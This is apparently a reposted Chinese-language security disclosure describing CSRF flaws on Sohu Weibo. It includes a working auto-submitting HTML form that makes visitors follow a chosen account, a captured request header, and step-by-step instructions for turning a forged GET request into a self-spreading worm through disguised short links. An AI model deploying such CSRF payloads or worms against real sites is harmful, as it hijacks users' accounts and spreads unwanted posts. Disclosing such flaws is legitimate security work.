1)CSRF刷粉丝
搜狐对于[xxx.t.sohu.com]这样的域名均未校验referer,例子POC如下:
< html >
<body>
<form id="se55i0n" name="se55i0n" action="http://ourhome.t.sohu.com/follow/addfollows" method="POST">
<input type="text" name="friendids" value="3262276" />
<input type="text" name="uid" value="3262276" />
<input type="submit" value="submit" />
</form>
<script>
document.se55i0n.submit();
</script>
</body>
</html>
2)CSRF蠕虫
2.1)无意间发现搜狐,有个像分析推荐某某微博的功能,点击推荐搜狐官方微博并抓包;
Host: t.sohu.com
Proxy-Connection: keep-alive
Origin: http://t.sohu.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Cookie: ...
2.2)试着改为GET请求,居然成功了(太不应该了),请求成功后会发送一条微博;
看测试效果;
2.3)经过后面的测试,发现[msg]的内容和uid参数也是能够完全掌控的,所以这就给了我们机会来小玩一次csrf蠕虫。将下面的GET请求伪装成一个短地址,再配上诱人的内容;
看效果图,:D
2.4)好吧,想让它多传播几次,我们只需要将上面的转换好了的短地址再出入到msg内容里,并将其再转换地址,这样就具备了2次传播的功能,当然可不止这么一种玩法哟;
哈哈,我们还是看效果吧(想几次传播你说了算);
2.5)一个较完整的二次传播测试效果,哈哈(发个微博诱惑大家点击,用户点击后形成第一次传播,用户的粉丝再点击形成第二次传播,当然还可以第三次、第四次....)
PS:仅仅自己测试,我木有粉丝哈哈!
查看更多关于搜狐微博CSRF蠕虫一触即发+CSRF刷粉丝 - 网站安全的详细内容...